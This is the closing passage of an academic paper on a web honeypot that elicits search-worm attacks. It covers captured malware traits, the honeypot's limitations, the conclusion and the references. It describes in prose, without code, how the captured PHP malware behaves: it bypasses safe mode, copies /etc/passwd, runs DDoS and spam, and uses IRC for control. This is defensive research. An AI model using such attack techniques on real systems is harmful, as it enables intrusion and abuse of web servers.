the output in some user-friendly graphical user interface,obfuscate the script itself, clean the logs, erase the scriptand related evidence, deface a site, crawl vulnerabilitysites, perform distributed denial of service attacks andeven perform automatic self-updates. In some cases, themalware inserted tracking cookies and/or attempted togain more information about a system’s inner-workings(e.g., by copying /etc/passwd and performing localbanner scans). To our surprise, only eight scripts con-tained functionality to automatically obtain root. Inthese cases, they all used C-based kernel vulnerabili-ties that write to the disk and compile upon exploita-tion. Lastly, IRC was used almost exclusively as thecommunication medium. As can be expected, we alsoobserved several instances of spamming malware us-ing e-mail addresses pulled from the web-application’sMySQL database backend. In a system like phpBB,this can be highly effective because most forum usersenter an e-mail address during the registration process.Cross-checking the bot IPs with data from the Spamhausproject [2] shows that roughly 36% of them currently ap-pear in the spam black list.

One noteworthy functionality that seems to transcendour categorizations among PHP scripts is the ability tobreak out of PHP safe mode. PHP safe mode disablesfunctionality for, among others, executing system com-mands, modifying the file system, etc. The malware weobserved that bypass safe mode tend to contain a hand-ful of known exploits that either exploit functionalityin PHP, functionality in mysql, or functionality in webserver software. Lastly, we note that although we ob-served what appeared to be over 5,648 unique injectionscripts from distinct botnets, nearly half of them pointto zombie botnets. These botnets no longer have a cen-tralized control mechanism and the remotely includedscripts are no longer accessible. However, they are stillresponsible for an overwhelming amount of our observedHTTP traffic.

6.3 Limitations

One might argue that a considerably less complex (butmore mundane) approach for eliciting search worm traf-fic may be to generate large static pages that con-tain content representative of a variety of popular web-applications. However, simply returning arbitrary orstatic pages does not yield either the volume or diver-sity of attacks we observed. For instance, one of ourdepartmental websites (with a much higher PageRankthan our deployment site) only witnessed 437 similar at-tacks since August 2006. As we showed in Section 6,we witnessed well over 368,000 attacks in just over twomonths. Moreover, close inspection of the attacks on theuniversity website show that they are far less varied or

interesting. These attacks seem to originate from eithera few botnets that issue “loose” search queries (e.g., “in-url:index.php”) and subsequently inject their attack, orsimply attack ubiquitous file names with common vari-able names. Not surprisingly, these unsophisticated bot-nets are less widespread, most likely because they failto infect many hosts. By contrast, the success of ourapproach lead to more insightful observations about thescope and diversity of attacks because we were able tocast a far wider net.

That said, for real-world honeypot deployments, de-tection and exploitation of the honeypot itself can be aconcern. Clearly, our system is not a true web-serverand like other honeypots [23], it too can be trivially de-tected using various fingerprinting techniques [14]. Moreto the point, a well-crafted bot that knows that a partic-ular string always appears in pages returned by a givenweb-application could simply request the page from usand check for the presence of that string. Since we willlikely fail to produce that string, our phony will be de-tected9.

The fact that our web-honeypot can be detected is aclear limitation of our approach, but in practice it has nothindered our efforts to characterize current attack trends,for several reasons. First, the search worms we witnessedall seemed to use search engines to find the identifyinginformation of a web-application, and attacked the vul-nerability upon the first visit to the site; presumably be-cause verifying that the response contains the expectedstring slows down infection. Moreover, it is often timesdifficult to discern the web-application of origin as manyweb-applications do not necessarily contain strings thatuniquely identify the software. Indeed, in our own analy-sis, we often had difficulty identifying the targeted web-application by hand, and so automating this might not betrivial.

Lastly, we argue that the limitations of the approachproposed herein manifests themselves as trade-offs. Ourdecision to design a stateless system results in a memory-efficient and lightweight deployment. However, this de-sign choice also makes handling stateful protocols nearlyimpossible. It is conceivable that one can convert ourarchitecture to better interact with stateful protocols bysimply changing some aspects of the design. For in-stance, this could be accomplished by incorporating flowsequence information into training and then recalling itshierarchy during generation (e.g., by generating a re-sponse from the set of appropriate first round responses,then second round responses, etc.). To capture multi-stage attacks, however, ScriptGen [18, 17] may be a bet-ter choice for emulating multi-stage protocol interaction,and can be used in conjunction with our technique to casta wider net to initially entice such malware.


7 Conclusion

In this paper, we use a number of multi-disciplinary tech-niques to generate dynamic responses to protocol in-teractions. We demonstrate the utility of our approachthrough the deployment of a dynamic content generationsystem targeted at eliciting attacks against web-basedexploits. During a two month period we witnessed anunrelenting barrage of attacks from attackers that scoursearch engine results to find victims (in this case, vulner-able web applications). The attacks were targeted at adiverse set of web applications, and employed a myriadof injection techniques. We believe that the results hereinprovide valuable insights on the nature and scope of thisincreasing Internet threat.

8 Acknowledgments

We thank Ryan MacArthur for his assistance with theforensic analysis presented in Section 6.2. We are grate-ful to him for the time spent analyzing and catalogingthe captured payloads. We also thank David Dagon forcross-referencing bot IP addresses with the SpamhausProject black lists [2]. We extend our gratitude to ourshepherd, George Danezis, and the anonymous review-ers for their invaluable comments and suggestions. Wealso thank Bryan Hoffman, Charles Wright, Greg Mac-Manus, Moheeb Abu Rajab, Lucas Ballard, and ScottCoull for many insightful discussions during the courseof this project. This work was funded in part by NFSgrants CT-0627476 and CNS-0546350.

Data Availability

To promote further research and awareness of the mal-ware problem, the data gathered during our live deploy-ment is available to the research community. For in-formation on how to get access to this data, please seehttp:/spar.isi.jhu.edu/botnet data/.

References

[1] Milw0rm. See http://www.milw0rm.com/.

[2] The Spamhaus Project. See http://www.spamhaus.org/.

[3] The Google Hack Honeypot, 2005. See http://ghh.sourceforge.net/.

[4] ANDERSON, D. S., FLEIZACH, C., SAVAGE, S.,AND VOELKER, G. M. Spamscatter: Character-izing internet scam hosting infrastructure. In Pro-ceedings of the 16th USENIX Security Symposium,pp. 135–148.

[5] BARFORD, P., AND YEGNESWARAN, V. An insidelook at botnets. In Advances in Information Secu-rity (2007), vol. 27, Springer Verlag, pp. 171–191.

[6] BEDDOE, M. The protocol informatics project,2004.

[7] CHEUNG, A. Secunia’s wordpress GBK/Big5character set ”S” SQL injection advisory. Seehttp://secunia.com/advisories/28005/.

[8] CUI, W., KANNAN, J., AND WANG, H. J. Discov-erer: Automatic protocol reverse engineering fromnetwork traces. In Proceedings of the 16th USENIXSecurity Symposium (Boston, MA, August 2007),pp. 199–212.

[9] CUI, W., PAXSON, V., WEAVER, N., AND KATZ,R. H. Protocol-independent adaptive replay of ap-plication dialog. In Network and Distributed Sys-tem Security Symposium 2006 (February 2006), In-ternet Society.

[10] CUI, W., PAXSON, V., AND WEAVER, N. C. GQ:Realizing a system to catch worms in a quarter mil-lion places. Tech. Rep. TR-06-004, InternationalComputer Science Institute, 2006.

[11] DUNLAP, G. W., KING, S. T., CINAR, S., BAS-RAI, M. A., AND CHEN, P. M. Revirt: enablingintrusion analysis through virtual-machine loggingand replay. In Proceedings of the 5th symposiumon Operating systems design and implementation(New York, NY, USA, 2002), ACM Press, pp. 211–224.

[12] FREILING, F. C., HOLZ, T., AND WICHERSKI, G.Botnet tracking: Exploring a root-cause method-ology to prevent distributed denial-of-service at-tacks. In Proceedings of the 10th European Sympo-sium on Research in Computer Security (ESORICS)(September 2005), vol. 3679 of Lecture Notes inComputer Science, pp. 319–335.

[13] GU, G., PORRAS, P., YEGNESWARAN, V., FONG,M., AND LEE, W. BotHunter: Detecting malwareinfection through IDS-driven dialog correlation. InProceedings of the 16th USENIX Security Sympo-sium (August 2007), pp. 167–182.

[14] HOLZ, T., AND RAYNAL, F. Detecting honeypotsand other suspicious environments. In Proceedingsof the Workshop on Information Assurance and Se-curity (June 2005).


[15] Know your enemy: Tracking botnets. Tech.rep., The Honeynet Project and Research Alliance,March 2005. Available from http://www.honeynet.org/papers/bots/.

[16] KREIBICH, C., AND CROWCROFT, J. Honeycomb- Creating Intrusion Detection Signatures UsingHoneypots. In Proceedings of the Second Workshopon Hot Topics in Networks (Hotnets II) (Boston,November 2003).

[17] LEITA, C., DACIER, M., AND MASSICOTTE, F.Automatic handling of protocol dependencies andreaction to 0-day attacks with ScriptGen based hon-eypots. In RAID (2006), D. Zamboni and C. Krugel,Eds., vol. 4219 of Lecture Notes in Computer Sci-ence, Springer, pp. 185–205.

[18] LEITA, C., MERMOUD, K., AND DACIER, M.ScriptGen: an automated script generation tool forhoneyd. In Proceedings of the 21st Annual Com-puter Security Applications Conference (December2005), pp. 203–214.

[19] NEEDLEMAN, S. B., AND WUNSCH, C. D. A gen-eral method applicable to the search for similaritiesin the amino acid sequence of two proteins. Journalof Molecular Biology, 48 (1970), 443–453.

[20] NEWSOME, J., KARP, B., AND SONG, D. Poly-graph: Automatically generating signatures forpolymorphic worms. In Proceedings of the 2005IEEE Symposium on Security and Privacy (Wash-ington, DC, USA, 2005), IEEE Computer Society,pp. 226–241.

[21] NEWSOME, J., AND SONG, D. Dynamic taintanalysis for automatic detection, analysis, and sig-nature generation of exploits on commodity soft-ware. In Proceedings of the Network and Dis-tributed System Security Symposium (2005).

[22] PANG, R., YEGNESWARAN, V., BARFORD, P.,PAXSON, V., AND PETERSON, L. Characteristicsof Internet background radiation, October 2004.

[23] PROVOS, N. A virtual honeypot framework. InProceedings of the 12th USENIX Security Sympo-sium (August 2004), pp. 1–14.

[24] PROVOS, N., MCCLAIN, J., AND WANG, K.Search worms. In Proceedings of the 4th ACMworkshop on Recurring malcode (New York, NY,USA, 2006), ACM, pp. 1–8.

[25] PROVOS, N., MCNAMEE, D., MAVROMMATIS,P., WANG, K., AND MODADUGU, N. The ghostin the browser: Analysis of web-based malware. In

Usenix Workshop on Hot Topics in Botnets (Hot-Bots) (2007).

[26] RAJAB, M. A., ZARFOSS, J., MONROSE, F., AND

TERZIS, A. A multifaceted approach to under-standing the botnet phenomenon. In Proceedings ofACM SIGCOMM/USENIX Internet MeasurementConference (October 2006), ACM, pp. 41–52.

[27] RAJAB, M. A., ZARFOSS, J., MONROSE, F., AND

TERZIS, A. My botnet is bigger than yours (maybe,better than yours): Why size estimates remain chal-lenging. In Proceedings of the first USENIX work-shop on hot topics in Botnets (HotBots ’07). (April2007).

[28] RIDEN, J., MCGEEHAN, R., ENGERT, B., AND

MUETER, M. Know your enemy: Web applicationthreats, February 2007.

[29] TATA, S., AND PATEL, J. Estimating the selec-tivity of TF-IDF based cosine similarity predicates.SIGMOD Record 36, 2 (June 2007).

[30] WITTEN, I. H., AND BELL, T. C. The zero-frequency problem: Estimating the probabilities ofnovel events in adaptive text compression. IEEETransactions on Information Theory 37, 4 (1991),1085–1094.

[31] YEGNESWARAN, V., GIFFIN, J. T., BARFORD,P., AND JHA, S. An Architecture for Generat-ing Semantics-Aware Signatures. In Proceedings ofthe 14th USENIX Security Symposium (Baltimore,MD, USA, Aug. 2005), pp. 97–112.

Notes1 The drawback, of course, is that high-interaction honeypots are

a heavy-weight solution, and risk creating their own security prob-lems [23].

2Protocol messages are tokenized similarly in [18, 17] and [8].3In practice, we use printable and non-printable.4The results are virtually the same for nslookup, and hence, omit-

ted.5These initial queries were provided by one of the authors, but simi-

lar results could easily be achieved by crawling the WebApp directoriesin SourceForge and searching Google for identifiable strings (similar towhat we outline in Section 6.1.1).

6We placed links on 3 pages with Google PageRank ranking of 6, 2pages with rank 5, 3 pages with rank 2, and 5 pages with rank 0.

7A preloaded library loads before all other libraries in order to hookcertain library functions

8Because none of the malware we obtained use direct system callsto either connect() or send(), this setup suffices for our needs.

9Notice however that if a botnet has n bots conducting an attackagainst a particular web-application, we only need to probabilisticallyreturn what the malware is seeking 1/nth of the time to capture themalicious payload.

to catch a predator a natural language approach for ... · a natural language approach for...

Documents